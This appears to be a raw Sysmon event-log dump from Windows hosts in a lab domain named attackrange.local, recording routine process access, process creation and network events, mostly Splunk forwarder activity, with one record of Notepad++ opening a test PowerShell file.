08:01:40.782{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052426Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:01:40.782{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F6E4-60EB-AD7D-00000000CF01}8884C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052425Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:40.782{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F6E4-60EB-AD7D-00000000CF01}8884C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Notepad++\NppShell_06.dll+4449|C:\Program Files\Notepad++\NppShell_06.dll+46a6|C:\Windows\System32\SHELL32.dll+80337|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+16d60c|C:\Windows\System32\SHELL32.dll+19e7e8|C:\Windows\System32\SHELL32.dll+2844a3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+16d8b0|C:\Windows\System32\SHELL32.dll+16ad2e|C:\Windows\System32\SHELL32.dll+737a1|C:\Windows\System32\SHELL32.dll+76686|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53 154100x80000000000000001052424Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:40.760{466BC892-F6E4-60EB-AD7D-00000000CF01}8884C:\Program Files\Notepad++\notepad++.exe8.11Notepad++ : a free (GPL) source code editorNotepad++Don HO don.h@free.frnotepad++.exe"C:\Program Files\Notepad++\notepad++.exe" 
"C:\Temp\test\ws.ps1"C:\Windows\system32\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=3433991765511375D3EC11B4FE290298,SHA256=B30DDA913768A864106485E51682E90286D320023221F5676A42CC9B914A11F8,IMPHASH=B65402F137E08F6E43CEEF2CF25E0CC2{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 23542300x80000000000000001052423Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:40.462{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BA7E91BB9FDEA0AC33527A5693AB939,SHA256=CB82CC2834DEA65E94F10105F9093E742B9F579146D5234412D0F6A70FDD4868,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809296Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:40.223{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6D6597BC4C7A7DEF3A3FB5B07096FDC,SHA256=4467F43FDC6BBF75EA1B50AE0E1C01C044FE964393C4B479366B7E20E966D51E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052434Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:41.796{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EBF117E96FC513BB7862DF1080E1B9A1,SHA256=BF1E39E1BF898C51947C219B7FF89FD4726E311D07A53828DBA6258848366725,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052433Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:01:41.481{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FC17F9AB1A38683C7F849926C778263,SHA256=7F2D58237004975103C3FA5431EB5BBAD5B5F6869CBC2B1D9DF211B49A3C5C1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809297Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:41.223{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=812C749CB07E36AAC3BBA0B8AA31D43C,SHA256=B74AC0C8B51A9486AE3DE1834896F48AC17B74CEFA9693605A484433E8FE799E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052436Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:34.316{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse62.80.172.54-59904-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001052435Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:42.496{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5670D1AFDF4A7C196BB9AD7A29AA24E6,SHA256=2A00032B15E2A0CB5A565AE610B5D422C05A4A7F78DDD62D6AAD520737D8EF61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809299Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:42.239{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72DFF7847313E32976A22B30D8A0D60B,SHA256=EBEB68AC0B23563FBA1992C59DE33CECFDCBC107CDC93C833420BED65E3D1AB6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809298Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:40.387{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57385-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001052439Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:35.645{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51162-false10.0.1.12-8000- 23542300x80000000000000001052438Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:43.511{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7641E15AE4FACA59B66BEC14300CFE37,SHA256=5C2B8F2468641ECD838909D699629A990D5C445E6D8A0D0F4D0AC80A6DC2C220,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809300Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:43.239{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF72DE0074791039699A1230DDC72F80,SHA256=71613BBAE09B31776298B4BC71431C7FB398106932DB923871A1FF2A381A2A93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052437Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:43.142{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1AA359AD0FE4743E74D97B4A7241F0E5,SHA256=473484EBB446AC791DC047F203D0F271BF07BE5F2E4E3789EBE5867D16AABFB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052440Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:44.526{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=789A21D3E7AA629DC0094EF64F63DA54,SHA256=BAC7A6FB018EF2BE653DE87D1AB5C9578E924ED620845281954640F1328A64FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809301Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:44.239{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C0AB490FBE7A06A934E4A1BC6EBCA60,SHA256=1B4C59FAB17B6309A923BE4396FA2C2074E5CC6ED42DFB153A5E56CB1F718E08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052441Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:45.527{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26ACF9AEB41AC34F48101865FB68D093,SHA256=71463E53068B7EF3E3D28AC23D315EC5DBC5B8AE5B7CBD54EE8B2040DDCE461C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809302Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:45.254{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1790D6C7204ABF1C636F874294CED577,SHA256=823ED9380E6BF46FEE1282999AF037FA7C1BD1B2A0B7BD485955F5FFCF91003B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052442Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:46.542{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FD47F72EA3D2D15AD0890FCD499F7DB,SHA256=D637AFB8A1F45CE7D4055ADF61769A6C9C741D2EC564EEE743A76AE7804DF934,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809303Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:46.270{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18C48B28379443F9B322026ADB9E84A7,SHA256=7B8680F89F1ABF12907F82E85D28EF96DFFA51E07823047E9A7EDA1E780AD8D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052443Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:01:47.559{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D3FDCE659D2F66D0855C51C15554559,SHA256=DA576FB7747251B9766D1EAB3E30C1B236F807E588C29FB214F7A9B4A94A8855,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809305Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:46.277{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57386-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809304Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:47.301{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99B785D79AF783900B34295A8312024B,SHA256=92D99E8012E62D292A34C7ECD55BD7C29499661DC765086F7EE86C27F4051FE7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052445Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:40.675{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51163-false10.0.1.12-8000- 23542300x80000000000000001052444Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:48.580{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E146B4E8A3EB2F42714A0E0E4D2E025,SHA256=B2D2B1A037AE84C2267BE251A02C9E0CA9B7D8CBD65D66CAEA9969AB0EEBDDF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809306Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:48.301{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B91C2D785AA1B9D4C37EB4115A89DECD,SHA256=CF51D605FD47B6D0AE6D6150C604380CE32D8F644E4C62CC3798A184AEFE9530,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052446Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:49.595{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78C1CACA6CB0403F84CC6331221129F2,SHA256=0E004A7419CAC024B3E42E372CE447481F1600BB0BDC57643F7BAA8090B0C8A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809307Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:49.317{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2F7D48B0197326A5991CD9A15D8F05D,SHA256=CC69227B5494DD139C77E433CA8DC8ADDEF5755DE034901F54A6344B1866A89C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052464Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:01:50.910{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F6EE-60EB-AF7D-00000000CF01}4128C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052463Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:50.910{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052462Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:01:50.910{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052461Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:50.910{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052460Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:01:50.894{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052459Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:50.894{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F6EE-60EB-AF7D-00000000CF01}4128C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052458Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:50.894{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F6EE-60EB-AF7D-00000000CF01}4128C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052457Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:50.896{466BC892-F6EE-60EB-AF7D-00000000CF01}4128C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001052456Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:50.626{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=668D082467147352625EEF21442897C9,SHA256=20C8FE62F28DBB0E79CB13388EDEDFA8492A00C654C493C1A2BDAF4EB1DFD56D,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000809308Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:50.333{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4694DB17F42F9B15AD0B75BFB3ADEF77,SHA256=D16AEA7C084A300B0C5A34C2D29BD62FBADA2E4813E80752472D585B7B35712C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052455Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:50.563{466BC892-F6EE-60EB-AE7D-00000000CF01}93369892C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052454Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 